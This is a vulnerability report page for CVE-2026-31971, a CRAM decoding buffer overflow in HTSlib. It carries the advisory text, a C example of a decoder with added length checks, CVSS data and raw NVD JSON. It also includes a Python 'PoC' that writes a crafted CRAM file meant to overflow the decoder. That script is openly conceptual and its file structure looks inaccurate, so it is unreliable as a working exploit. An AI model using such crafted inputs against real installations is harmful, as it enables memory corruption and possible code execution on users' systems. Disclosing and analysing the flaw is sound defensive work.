Security Vulnerability Report
CVE-2026-31971 CVSS 8.1 HIGH

CVE-2026-31971

Published: 2026-03-18 20:16:22
Last Modified: 2026-03-19 13:58:32

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_LEN` method, the `cram_byte_array_len_decode()` function failed to validate that the amount of data being unpacked matched the size of the output buffer where it was to be stored. Depending on the data series being read, this could result either in a heap buffer overflow or a stack overflow with attacker-controlled bytes. If a user opens a file crafted to exploit this issue it could lead to the program crashing, overwriting of data structures on the heap or stack in ways not expected by the program, or changing the control flow of the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.
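The defect class described above is a length taken from the input and used as a copy count without comparing it against the destination buffer (CWE-1284 leading to CWE-787). The following is an added illustration, not HTSlib's code and not the real CRAM `BYTE_ARRAY_LEN` codec (which decodes the length and the bytes through separate sub-encodings): it models the decode as a varint length prefix followed by that many bytes, and shows the two checks a decoder needs before copying, with constructed sample streams. The function and sample names are assumptions made for this example.

```c
/* Simplified model of a length-prefixed byte array decode, written as an
   illustration of the missing-validation bug class. This is not HTSlib's
   cram_byte_array_len_decode() and does not parse real CRAM containers. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Decode a little-endian base-128 varint into *out.
   Returns the number of input bytes consumed, or 0 if the stream ends
   before the varint terminates (or the value would exceed 32 bits). */
static size_t read_varint(const uint8_t *in, size_t in_len, uint32_t *out) {
    uint32_t v = 0;
    unsigned shift = 0;
    size_t i = 0;
    while (i < in_len && shift < 32) {
        uint8_t b = in[i++];
        v |= (uint32_t)(b & 0x7f) << shift;
        if (!(b & 0x80)) {
            *out = v;
            return i;
        }
        shift += 7;
    }
    return 0;
}

/* Hardened decode: returns 0 on success and fills out/out_len;
   -1 malformed length prefix, -2 length larger than the output buffer,
   -3 length larger than the remaining input. Nothing is written to `out`
   on any error path. */
int decode_byte_array_len(const uint8_t *in, size_t in_len,
                          uint8_t *out, size_t out_size, size_t *out_len) {
    uint32_t len;
    size_t n = read_varint(in, in_len, &len);
    if (n == 0)
        return -1;
    /* The check the advisory describes as missing: the attacker-chosen
       length must fit the caller's buffer before any byte is copied. */
    if (len > out_size)
        return -2;
    /* The input must also actually contain that many bytes (n <= in_len
       is guaranteed by read_varint, so the subtraction cannot wrap). */
    if (len > in_len - n)
        return -3;
    memcpy(out, in + n, len);
    *out_len = len;
    return 0;
}

/* Constructed sample streams for this example (not from any real file). */
static const uint8_t SAMPLE_OK[]        = { 0x03, 'A', 'C', 'G' };    /* len 3   */
static const uint8_t SAMPLE_OVERSIZED[] = { 0x80, 0x01, 'A' };        /* len 128 */
static const uint8_t SAMPLE_TRUNCATED[] = { 0x05, 'A', 'C' };         /* len 5, 2 bytes present */
static const uint8_t SAMPLE_BADLEN[]    = { 0x80 };                   /* unterminated varint */

/* Run one sample against an 8-byte output buffer; returns the decoder's rc. */
int run_sample(const uint8_t *in, size_t in_len) {
    uint8_t out[8];
    size_t out_len = 0;
    return decode_byte_array_len(in, in_len, out, sizeof out, &out_len);
}

int main(void) {
    printf("ok:        %d\n", run_sample(SAMPLE_OK, sizeof SAMPLE_OK));
    printf("oversized: %d\n", run_sample(SAMPLE_OVERSIZED, sizeof SAMPLE_OVERSIZED));
    printf("truncated: %d\n", run_sample(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED));
    printf("badlen:    %d\n", run_sample(SAMPLE_BADLEN, sizeof SAMPLE_BADLEN));
    return 0;
}
```

The ordering matters: the output-size check comes first so that a hostile length never reaches `memcpy`, and the remaining-input check prevents an over-read of the source block. Both return distinct codes so a fuzzing harness or a caller can tell a malformed stream from a buffer-sizing error.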

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE
HTSlib < 1.21.1
HTSlib < 1.22.2
HTSlib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-31971 PoC - HTSlib CRAM Buffer Overflow
Note: This is a conceptual PoC for demonstration purposes
"""
import struct


def generate_malicious_cram():
    """
    Generate a malicious CRAM file that triggers buffer overflow
    in cram_byte_array_len_decode()
    """
    # CRAM file header
    header = b'CRAM'  # Magic number

    # Container header
    container = bytearray()
    container += struct.pack('>I', 0x00000001)  # Block content ID
    container += struct.pack('>I', 0xFFFFFFFF)  # Compressed data size (malicious)

    # Malicious BYTE_ARRAY_LEN encoded data
    # This simulates a crafted data block that exceeds buffer size
    malicious_data = bytearray()
    malicious_data += b'\x00'  # Encoding type for BYTE_ARRAY_LEN
    malicious_data += struct.pack('>Q', 0xFFFFFFFFFFFFFFFF)  # Fake length
    malicious_data += b'\x41' * 0x1000  # Overflow data

    # File container
    cram_file = header + container + malicious_data
    return cram_file


def main():
    print("[*] Generating malicious CRAM file for CVE-2026-31971")
    poc_data = generate_malicious_cram()
    with open('CVE-2026-31971_poc.cram', 'wb') as f:
        f.write(poc_data)
    print("[+] PoC file generated: CVE-2026-31971_poc.cram")
    print("[*] When opened by a vulnerable version of HTSlib,")
    print("    this file may trigger heap/stack buffer overflow")


if __name__ == '__main__':
    main()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-31971", "sourceIdentifier": "[email protected]", "published": "2026-03-18T20:16:22.243", "lastModified": "2026-03-19T13:58:31.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_LEN` method, the `cram_byte_array_len_decode()` failed to validate that the amount of data being unpacked matched the size of the output buffer where it was to be stored. Depending on the data series being read, this could result either in a heap or a stack overflow with attacker-controlled bytes. Depending on the data stream this could result either in a heap buffer overflow or a stack overflow. If a user opens a file crafted to exploit this issue it could lead to the program crashing, overwriting of data structures on the heap or stack in ways not expected by the program, or changing the control flow of the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo de bioinformática. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN utilizando una variedad de codificaciones y métodos de compresión. Al leer datos codificados utilizando el método 'BYTE_ARRAY_LEN', la función 'cram_byte_array_len_decode()' no validó que la cantidad de datos que se estaban desempaquetando coincidiera con el tamaño del búfer de salida donde se iba a almacenar. Dependiendo de la serie de datos que se leyera, esto podría resultar en un desbordamiento de montón o un desbordamiento de pila con bytes controlados por el atacante. Dependiendo del flujo de datos, esto podría resultar en un desbordamiento de búfer en el montón o un desbordamiento de pila. Si un usuario abre un archivo diseñado para explotar este problema, podría provocar el bloqueo del programa, la sobrescritura de estructuras de datos en el montón o la pila de maneras no esperadas por el programa, o el cambio del flujo de control del programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}, {"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*: ... (truncated)
```